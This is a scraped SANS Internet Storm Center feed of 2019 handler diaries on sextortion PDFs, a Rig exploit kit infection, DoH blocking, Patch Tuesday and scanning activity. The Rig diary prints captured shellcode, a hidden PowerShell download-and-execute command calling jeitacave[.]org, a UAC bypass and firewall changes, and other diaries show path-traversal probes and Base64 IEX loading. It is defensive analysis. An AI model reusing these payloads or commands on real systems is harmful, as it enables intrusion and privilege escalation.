SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 1 óra 8 perc
2019. szeptember 16.

Encrypted Sextortion PDFs, (Mon, Sep 16th)

We've written about sextortion emails several times. Reader Jason submitted another variant: password protected PDFs with a sextortion message (including QR code for the BTC address).

This gives me the opportunity to discuss some interesting aspects of encrypted PDFs.

PDFs can be encrypted for 2 main purposes: confidentiality and "Digital Rights Management" (DRM).

When a PDF is encrypted for confidentiality, the user has to provide a password upon opening of the PDF. This is known as the user password.

While opening a DRM PDF does not require the user to provide a password. The user can just read the content of the PDF without a password, but the user might be restricted as to what can be done with the PDF. For example, printing or copying text might be disabled. To change these DRM settings, the user needs a owner password.

An unusual property of encrypted PDFs, is that their internal structure remains unencrypted. When a PDF file is encrypted (for confidentialy or DRM), the whole content of the PDF file is not encrypted. Contrary with other file formats, like Word documents. The internal structure, like objects and names, is not encrypted. What is encrypted, are strings and streams.

So for example, when a PDF document contains a JavaScript script, there will be an object with name /JavaScript in its dictionary (we exclude stream objects /ObjStm in this example). And the script itself will be contained inside a string as a dictionary value (again, in this example).

When this PDF is encrypted, the object with its dictionary keys (like /JavaScript) will remain in cleartext, while the string with the script will be encrypted.

Let's analyze a sample submitted by Jason with pdfid.py. Here is the result:

First of all, the counter for name (keyword) /Encrypt is not zero: this tells us that the PDF is encrypted.

Second, the counter for name /ObjStm is zero: this tells us that the PDF does not contain stream objects (/ObjStm). This is important to check when dealing with encrypted PDFs, as stream objects are objects that contain other objects inside their stream. And since streams are encrypted, the objects contained inside a stream object are completely encrypted, and thus totally opaque to us unless we decrypt the document.

All the other names have counters equal to zero: although this is no guarantee that the PDF is not malicious, it is often a strong indication that this PDF does not contain malicious code, unless this is not your common malware attack (like a targeted attack or a pure binary exploit for a zero-day).

So the next step to take, is to look at the content of this PDF. For this, we need the password (4534 for this sample, it was included in the email message) to open the document. While you can open this document with any PDF reader (best done inside a VM), I'm going to view the content with pdftotext, a free utility that comes with the open source software Poppler.

The user password 4534 is provided via option -upw.

It's clear that this is a sextortion message. It was delivered via an encrypted PDF in an attempt to evade detection.

Encrypted PDFs often pose a problem for anti-spam and anti-virus solutions, when they are not able to decrypt the content. My pdf tools have no decryption capabilities: I first use QPDF to decrypt PDFs for further analysis with my tools.

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 16.

ISC Stormcast For Monday, September 16th 2019 https://isc.sans.edu/podcastdetail.html?id=6666, (Mon, Sep 16th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 13.

Rig Exploit Kit Delivering VBScript, (Thu, Sep 12th)

I detected the following suspicious traffic on a corporate network. It was based on multiples infection stages and looked interesting enough to publish a diary about it. This is also a good reminder that, just by surfing the web, you can spot malicious scripts that will try to infect your computer (Exploit Kits).

It started with a succession of HTTP redirects across multiple domains, all using the .xyz TLD. 

You can see that the servers are hosted behind Cloudflare. All domains are registered via the same registrar (NameCheap). If you visit manually the first URL, it redirects you to Google. I did not find what triggers the redirect: the language (es-ES), the user-agent? GeoIP? When I analyzed the websites visited by the victim, I'm not 100% confident about the website infected with the malicious URL (there was also a lack of HTTP Referer) but it looks to be openload[.]co, a file-sharing platform.

The script delivered by the last visited URL is written in VBScript. That’s why a first test is performed to ensure that it has been delivered to a proper target:

<script> if (window.ActiveXObject || "ActiveXObject" in window){ ...

The code is not complex to deobfuscate. It is just escaped:

Multiple infection stages are present. You can see a link to a malicious Flash file ("1.swf") (SHA256:498496827afc0aa5960d1cb1d60f7ae7699e0906e3a8c657b6864cff10772df0) with a VT score of 7/55[1]. This is a classic infection method for many exploit kits.

In the VBScript code, we have this very interesting function:

Function GetShellcode() TEMPCODE = Unescape("%u0000%u0000%u0000%u0000") & Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%u1de0%u0a2a%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u736d%u7468%u2061%u7468%u7074%u2f3a%u6a2f%u6965%u6174%u6163%u6576%u6f2e%u6772%u682f%u6174%u682e%u6174%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" & FNB(FNA(""))) TEMPCODE = TEMPCODE & String(( & h80000 - LenB(TEMPCODE)) / 2, Unescape("%u4141")) GetShellcode = TEMPCOD End Function

And how it is loaded and execute:

vb_adrr = LeakVBAddr() vbs_base = GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base = GetBaseFromImport(vbs_base, "msvcrt.dll") krb_base = GetBaseFromImport(msv_base, "kernelbase.dll") ntd_base = GetBaseFromImport(msv_base, "ntdll.dll") VirtualProtectAddr = GetProcAddr(krb_base, "VirtualProtect") NtContinueAddr = GetProcAddr(ntd_base, "NtContinue") SetMemValue GetShellcode() ShellcodeAddr = GetMemValue() + 8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) VirtualProtectAddrFake = GetMemValue() + 69596 SetMemValue ExpandWithVirtualProtect(VirtualProtectAddrFake) ReuseCLASSl = GetMemValue() ExecuteShellcode()

Another technique is tried to infect the computer via a Powershell script:

function runmumaa() On Error Resume Next set shell = createobject("Shell.Application") command = "-nop -windowstyle hidden -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxp://jeitacave[.]org/ps004.jpg')" shell.ShellExecute "powershell.exe", command, "", "", 0 end function

The file ‘pw004.jpg’ is another PowerShell script, decimal encoded:

& ( $SheLLID[1]+$shELlid[13]+'X') (" $( seT-iTEm 'VaRIABlE:ofS' '') " + [STrING]( ( 36, 77,117, 116 ,117, 97 ,108 ,69, 120, 99 , 108 ,117, 115 , 105 ,118, 101, 78 ,97 , 109, 101 ,32,61,32,39,71 , 108 ,111, 98 ,97 , 108,92,105,102 ,113 ,71, 112 ,84 , 122 , 100 ,84 ,122, 104 ,77, 74, 83 ,79, 122 , 39, 13 ,10 ,36, 77 , 117 ,116 ,117,97 , 108 , 83, 117 ,99 ,99, 101, 115, 115 ,102 ,117, 108 ,111 ,114 ,110,111,116,32, 61, 32 , 36 ,102,108 ,97, 115 ,101 ,13 , 10 , 36 , 77 , 117 , 116 , 101, 120 ,32, 61 , 32 , 78, 101 ,119 , 45 ,79 ,98 , 106 , 101, 99 , 116,32 ,83 , 121,115 , 116, 101,109,46, 84,104, 114, 101,97 , 100 , 105 , 110 ...

This script creates a MUTEX ('Global\ifqGpTzdTzhMJSOz’) and checks if it is being run with administrator privileges. If yes, it downloads and executes another payload (hxxp://jeitacave[.]org/4U22nOJHFdDmYcgCS.jpg). It’s a MSI file (SHA256:33d3568638a62c695823ef00bb0e4d5a717e86870457f6d7ab044eea4a455314) unknown on VT.

public static class msi { [DllImport("msi.dll", CharSet=CharSet.Auto)] public static extern int MsiInstallProduct(string packagePath, string commandLine); [DllImport("msi.dll")] public static extern int MsiSetInternalUI(int dwUILevel, IntPtr phWnd); } "@ [msi]::MsiSetInternalUI(2,0); [msi]::MsiInstallProduct("hxxp://jeitacave[.]org/4U22nOJHFdDmYcgCS.jpg",”")

Otherwise, it tries to elevate its privileges via the classic EventViewer technique[2]:

[String]$program = "cmd /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f&reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f" New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value $program -Force Start-Process "C:\Windows\System32\Eventvwr.exe" -WindowStyle Hidden Start-Sleep 3 Remove-Item "HKCU:\Software\Classes\mscfile" -Recurse -Force Add-Type -TypeDefinition @" using System; using System.Diagnostics; using System.Runtime.InteropServices;

Once executed, the MSI package is installed via msiexec.exe and performs interesting actions: It disables WindowsDefender and alters the local firewall by allowing many incoming connections to well-known ports:

"C:\Windows\System32\netsh.exe" ipsec static add policy name=qianye "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1 "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=21 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=2222 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=3333 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=4444 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=5555 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=6666 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=7777 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=8443 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=8888 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=9000 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=9999 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=14443 protocol=TCP "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=14444 protocol=TCP

The latest Powershell script also spawns a csc.exe[3] compiler: 

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\yboqji-z.cmdline"

I'm still checking all the scripts and techniques used. Based on my threat feeds, the domain jeitacave[.]org has already been associated with the Rig[4] exploit kit.

[1] https://www.virustotal.com/gui/file/498496827afc0aa5960d1cb1d60f7ae7699e0906e3a8c657b6864cff10772df0/detection
[2] https://pentestlab.blog/2017/05/02/uac-bypass-event-viewer/
[3] https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
[4] https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 13.

ISC Stormcast For Friday, September 13th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6664, (Fri, Sep 13th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 12.

Blocking Firefox DoH with Bind, (Thu, Sep 12th)

For a few days, huge debates have started on forums and mailing lists regarding the announce of Mozilla to enable DoH (DNS over HTTPS[1]) by default in its Firefox browser. Since this announcement, Google also scheduled a move to this technology with the upcoming Chrome releases (this has been covered in today’s podcast episode). My goal is not here to start a new debate. DoH has definitively good points regarding privacy but the problem is always the way it is implemented. In corporate environments, security teams will for sure try to avoid the use of DoH for logging reasons (DNS logs are a gold mine in incident management and forensics).

Amongst the classic reconfiguration of the browser, Firefox implemented a technique to detect if DoH can or can't be used: by querying a specific domain: “use-application-dns.net”. Firefox will generate ‘A’ and ‘AAAA’ requests to this domain (using the DNS servers provided by the OS) and if ’NXDOMAIN’ is returned, it won’t use DoH.

This morning, a DNS request to resolve this domain returned the following data on my network:

$ dig use-application-dns.net a ; <<>> DiG 9.11.3-1ubuntu1.8-Ubuntu <<>> use-application-dns.net a ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32217 ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 5 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;use-application-dns.net. IN A ;; ANSWER SECTION: use-application-dns.net. 3600 IN A 185.199.110.153 use-application-dns.net. 3600 IN A 185.199.111.153 use-application-dns.net. 3600 IN A 185.199.108.153 use-application-dns.net. 3600 IN A 185.199.109.153 ;; AUTHORITY SECTION: use-application-dns.net. 172800 IN NS ns-cloud-b2.googledomains.com. use-application-dns.net. 172800 IN NS ns-cloud-b4.googledomains.com. use-application-dns.net. 172800 IN NS ns-cloud-b1.googledomains.com. use-application-dns.net. 172800 IN NS ns-cloud-b3.googledomains.com. ;; ADDITIONAL SECTION: ns-cloud-b1.googledomains.com. 291436 IN A 216.239.32.107 ns-cloud-b2.googledomains.com. 291436 IN A 216.239.34.107 ns-cloud-b3.googledomains.com. 291436 IN A 216.239.36.107 ns-cloud-b4.googledomains.com. 291436 IN A 216.239.38.107 ;; Query time: 1252 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Thu Sep 12 07:26:47 CEST 2019 ;; MSG SIZE rcvd: 301

Now, let’s see how to configure a Bind resolver (which is a well-know DNS server) to return ’NXDOMAIN’ when this domain is attempted to be resolved. The idea is to use RPZ (Response Policy Zones)[2]. I already covered this technique in a previous diary[3]. Here is a simple config for Bind:

Step 1, create a small zone file that will contain the domain we don’t want to resolve:

$TTL 300 @ SOA localhost. root.localhost (2019091200 2h 30m 30d 1h) NS localhost. ; The following list of IP addresses will timeout. use-application-dns.net CNAME .

Step 2, define this zone as a master one:

zone "doh.rpz" { type master; file "/etc/bind/doh.rpz"; };

Step 3, use the RPZ master zone and apply the policy:

response-policy { zone "doh.rpz" policy nxdomain; };

Note: If more domains will be used for the same purpose in the future, we just have to add them in the zone.

Reload your bind and let’s test:

$ dig use-application-dns.net a ; <<>> DiG 9.11.3-1ubuntu1.8-Ubuntu <<>> use-application-dns.net a ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 64852 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ; COOKIE: 728a8c24b984dab8ba5bd2e25d79e8688e337db42aba470d (good) ;; QUESTION SECTION: ;use-application-dns.net. IN A ;; ADDITIONAL SECTION: doh.rpz. 300 IN SOA localhost. root.localhost.doh.rpz. 2019091200 7200 1800 2592000 3600 ;; Query time: 0 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Thu Sep 12 06:40:40 UTC 2019 ;; MSG SIZE rcvd: 147

Sounds good! Let’s confirm with a tcpdump:

06:41:52.817392 IP (tos 0x0, ttl 64, id 38080, offset 0, flags [none], proto UDP (17), length 175) localhost.domain > localhost.35517: [bad udp cksum 0xfeae -> 0x2dad!] 52578 NXDomain q: A? use-application-dns.net. 0/0/2 ar: doh.rpz. SOA localhost. root.localhost.doh.rpz. 2019091200 7200 1800 2592000 3600, . OPT UDPsize=4096 (147)

Bonus: By checking your resolver logs, you’ll be able to detect the users who are using Firefox with DoH enabled on your network.

[1] https://en.wikipedia.org/wiki/DNS_over_HTTPS
[2] https://dnsrpz.info/
[3] https://isc.sans.edu/forums/diary/DNS+Firewalling+with+MISP/24556

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 12.

ISC Stormcast For Thursday, September 12th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6662, (Thu, Sep 12th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 11.

ISC Stormcast For Wednesday, September 11th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6660, (Wed, Sep 11th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 10.

Microsoft September 2019 Patch Tuesday, (Tue, Sep 10th)

This month we got patches for 79 vulnerabilities total. Two of them (CVE-2019-1214 and CVE-2019-1215) are being exploited, and three were previously disclosed (CVE-2019-1253, CVE-2019-1235, and CVE-2019-1294). 

The exploited vulnerabilities (CVE-2019-1214 and CVE-2019-1215) affects Windows Common Log File System (CLFS) driver and ws2ifsl.sys (Winsock), respectively. Both are privilege escalation vulnerabilities and may allow a local attacker to run processes in elevated privileges.

Amongst critical vulnerabilities, it's worth mentioning the LNK Remote Code Execution Vulnerability (CVE-2019-1280). It could allow remote code execution if an .LNK file is processed. An attacker may exploit this vulnerability by presenting the user a removable drive or a remote share containing a malicious.LNK file associated with a malicious binary. Once the user opens the drive (removable or shared), the malicious binary will execute on the user's system. Notice that the user doesn't need to execute the LNK file. It is enough to have the malicious .LNK parsed by Windows Explorer or any other application that parses .LNK files.

See Renato's dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

Description CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG) .NET Core Denial of Service Vulnerability %%cve:2019-1301%% No No Less Likely Less Likely Important     .NET Framework Elevation of Privilege Vulnerability %%cve:2019-1142%% No No Less Likely Less Likely Important     ASP.NET Core Elevation Of Privilege Vulnerability %%cve:2019-1302%% No No Less Likely Less Likely Important     Active Directory Federation Services XSS Vulnerability %%cve:2019-1273%% No No Less Likely Less Likely Important 8.2 7.4 Azure DevOps and Team Foundation Server Remote Code Execution Vulnerability %%cve:2019-1306%% No No Less Likely Less Likely Critical     Chakra Scripting Engine Memory Corruption Vulnerability %%cve:2019-1138%% No No - - Critical 4.2 3.8 %%cve:2019-1217%% No No - - Critical 4.2 3.8 %%cve:2019-1237%% No No Less Likely Less Likely Critical 4.2 3.8 %%cve:2019-1298%% No No - - Critical 4.2 3.8 %%cve:2019-1300%% No No - - Critical 4.2 3.8 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability %%cve:2019-1232%% No No Less Likely Less Likely Important 7.8 7.0 DirectWrite Information Disclosure Vulnerability %%cve:2019-1244%% No No Less Likely Less Likely Important 6.5 5.9 %%cve:2019-1245%% No No Less Likely Less Likely Important 6.5 5.9 %%cve:2019-1251%% No No Less Likely Less Likely Important 5.5 5.0 DirectX Elevation of Privilege Vulnerability %%cve:2019-1284%% No No - - Important 7.8 7.0 DirectX Information Disclosure Vulnerability %%cve:2019-1216%% No No - - Important 5.5 5.1 Jet Database Engine Remote Code Execution Vulnerability %%cve:2019-1240%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1241%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1242%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1243%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1246%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1247%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1248%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1249%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1250%% No No Less Likely Less Likely Important 7.8 7.0 LNK Remote Code Execution Vulnerability %%cve:2019-1280%% No No Less Likely Less Likely Critical 7.3 6.6 Latest Servicing Stack Updates ADV990001 No No - - Critical     Lync 2013 Information Disclosure Vulnerability %%cve:2019-1209%% No No - - Important     Microsoft Browser Security Feature Bypass Vulnerability %%cve:2019-1220%% No No Less Likely Less Likely Important 2.4 2.2 Microsoft Compatibility Appraiser Elevation of Privilege Vulnerability %%cve:2019-1267%% No No Less Likely Less Likely Important 7.3 6.6 Microsoft Edge based on Edge HTML Information Disclosure Vulnerability %%cve:2019-1299%% No No - - Important 4.3 3.9 Microsoft Excel Information Disclosure Vulnerability %%cve:2019-1263%% No No Less Likely Less Likely Important     Microsoft Excel Remote Code Execution Vulnerability %%cve:2019-1297%% No No Less Likely Less Likely Important     Microsoft Exchange Denial of Service Vulnerability %%cve:2019-1233%% No No Less Likely Less Likely Important     Microsoft Exchange Spoofing Vulnerability %%cve:2019-1266%% No No Less Likely Less Likely Important     Microsoft Graphics Components Information Disclosure Vulnerability %%cve:2019-1283%% No No - - Important 5.5 5.0 Microsoft Office Security Feature Bypass Vulnerability %%cve:2019-1264%% No No - - Important     Microsoft Office SharePoint XSS Vulnerability %%cve:2019-1262%% No No - - Important     Microsoft SharePoint Elevation of Privilege Vulnerability %%cve:2019-1260%% No No Less Likely Less Likely Important     Microsoft SharePoint Remote Code Execution Vulnerability %%cve:2019-1257%% No No More Likely More Likely Critical     %%cve:2019-1295%% No No More Likely More Likely Critical     %%cve:2019-1296%% No No More Likely More Likely Critical     Microsoft SharePoint Spoofing Vulnerability %%cve:2019-1259%% No No - - Moderate     %%cve:2019-1261%% No No Less Likely Less Likely Important     Microsoft Windows Store Installer Elevation of Privilege Vulnerability %%cve:2019-1270%% No No Less Likely Less Likely Important 6.3 5.7 Microsoft Yammer Security Feature Bypass Vulnerability %%cve:2019-1265%% No No Less Likely Less Likely Important     Remote Desktop Client Remote Code Execution Vulnerability %%cve:2019-0787%% No No More Likely More Likely Critical 7.5 6.7 %%cve:2019-0788%% No No More Likely More Likely Critical 7.5 6.7 %%cve:2019-1290%% No No More Likely More Likely Critical 7.5 6.7 %%cve:2019-1291%% No No More Likely More Likely Critical 7.5 6.7 Rome SDK Information Disclosure Vulnerability %%cve:2019-1231%% No No Less Likely Less Likely Important     Scripting Engine Memory Corruption Vulnerability %%cve:2019-1221%% No No - - Critical 6.4 5.8 September 2019 Adobe Flash Security Update ADV190022 No No Less Likely Less Likely Critical     Team Foundation Server Cross-site Scripting Vulnerability %%cve:2019-1305%% No No Less Likely Less Likely Important     VBScript Remote Code Execution Vulnerability %%cve:2019-1208%% No No Less Likely Less Likely Critical 6.4 5.8 %%cve:2019-1236%% No No Less Likely Less Likely Critical 6.4 5.8 Win32k Elevation of Privilege Vulnerability %%cve:2019-1256%% No No More Likely Unlikely Important 7.8 7.0 %%cve:2019-1285%% No No More Likely More Likely Important 7.8 7.0 Windows ALPC Elevation of Privilege Vulnerability %%cve:2019-1269%% No No Less Likely Less Likely Important 6.3 5.7 %%cve:2019-1272%% No No Less Likely Less Likely Important 6.3 5.7 Windows Audio Service Elevation of Privilege Vulnerability %%cve:2019-1277%% No No Less Likely Less Likely Important 7.8 7.0 Windows Common Log File System Driver Elevation of Privilege Vulnerability %%cve:2019-1214%% No Yes More Likely Unlikely Important 7.8 7.0 Windows Common Log File System Driver Information Disclosure Vulnerability %%cve:2019-1282%% No No Less Likely Less Likely Important 5.5 5.0 Windows Denial of Service Vulnerability %%cve:2019-1292%% No No Less Likely Less Likely Important 5.8 5.2 Windows Elevation of Privilege Vulnerability %%cve:2019-1215%% No Yes More Likely More Likely Important 7.8 7.0 %%cve:2019-1253%% Yes No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1278%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-1303%% No No Less Likely Less Likely Important     Windows GDI Information Disclosure Vulnerability %%cve:2019-1252%% No No Less Likely Less Likely Important 5.5 5.0 %%cve:2019-1286%% No No Less Likely Less Likely Important 5.5 5.0 Windows Hyper-V Denial of Service Vulnerability %%cve:2019-0928%% No No - - Important 5.4 4.9 Windows Hyper-V Information Disclosure Vulnerability %%cve:2019-1254%% No No Less Likely Less Likely Important 5.5 5.0 Windows Kernel Information Disclosure Vulnerability %%cve:2019-1274%% No No Less Likely Less Likely Important 6.3 5.7 Windows Media Elevation of Privilege Vulnerability %%cve:2019-1271%% No No Less Likely Less Likely Important 7.0 6.3 Windows Network Connectivity Assistant Elevation of Privilege Vulnerability %%cve:2019-1287%% No No Less Likely Less Likely Important 7.8 7.0 Windows SMB Client Driver Information Disclosure Vulnerability %%cve:2019-1293%% No No Less Likely Less Likely Important 5.5 5.0 Windows Secure Boot Security Feature Bypass Vulnerability %%cve:2019-1294%% Yes No Less Likely Less Likely Important 5.3 4.8 Windows Text Service Framework Elevation of Privilege Vulnerability %%cve:2019-1235%% Yes No Less Likely Less Likely Important 7.8 7.0 Windows Transaction Manager Information Disclosure Vulnerability %%cve:2019-1219%% No No More Likely More Likely Important 5.5 5.0 Windows Update Delivery Optimization Elevation of Privilege Vulnerability %%cve:2019-1289%% No No Less Likely Less Likely Important 7.0 6.3 Winlogon Elevation of Privilege Vulnerability %%cve:2019-1268%% No No Less Likely Less Likely Important 6.5 5.9

Total Vulnerabilities: 79

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 10.

ISC Stormcast For Tuesday, September 10th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6658, (Tue, Sep 10th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 9.

ISC Stormcast For Monday, September 9th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6656, (Mon, Sep 9th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 7.

Unidentified Scanning Activity, (Sat, Sep 7th)

Over the two weeks, my honeypot has captured a new scan. According for the URL targeted and some research, this might be used to identify Dahua[1] or HiSilicon[2] digital video recorder (DVR) product. So for I have only seen this activity against port 80 and the scans for this activity looks like this:

20190907-090937: 192.168.25.9:80-XXX.190.6.228:48968 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-093912: 192.168.25.9:80-XXX.188.126.243:36847 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-094441: 192.168.25.9:80-XXX.189.237.44:44343 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-100443: 192.168.25.9:80-XXX.188.40.103:35067 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-115225: 192.168.25.9:80-XXX.177.116.123:40904 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-115630: 192.168.25.9:80-XX.186.174.54:57636 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-122646: 192.168.25.9:80-XXX.189.27.141:38624 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'

If you are seeing this kind of activity and are able to help identify the product targeted or confirm it is one of the 2 I listed, leave a comment on our page. I did find an exploit against HiSilicon DVR released last year searching for the same URL[3].

[1] https://www.dahuasecurity.com/
[2] http://www.hisilicon.com
[3] https://www.exploit-db.com/exploits/44004

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 6.

PowerShell Script with a builtin DLL, (Fri, Sep 6th)

Attackers are always trying to bypass antivirus detection by using new techniques to obfuscate their code. I recently found a bunch of scripts that encode part of their code in Base64. The code is decoded at execution time and processed via the 'IEX' command:

iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("...Base64-data...")

Another technique used by malware developers is to inject a malicious DLL into a running process. Yes, Powershell can do awesome stuff. Yesterday, I spotted a script that hides its malicious code split in the two techniques. One part of the code is Base64 encode but some functions are directly called from a DLL loaded at run time.

First, the code is uncompressed and decoded, then loaded into the Powershell process:

$Z4GoLn = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String("..."), [IO.Compression.CompressionMode]::Decompress)
$joqOfPjY = New-Object byte[](20480)
$Z4GoLn.Read($joqOfPjY, 0, 20480) | Out-Null
[System.Reflection.Assembly]::Load($joqOfPjY) | Out-Null

Once the DLL is loaded, it's now possible to call all functions provided by the library. This is achieved by referencing the custom type and the method ("[custom.type]::method()"):

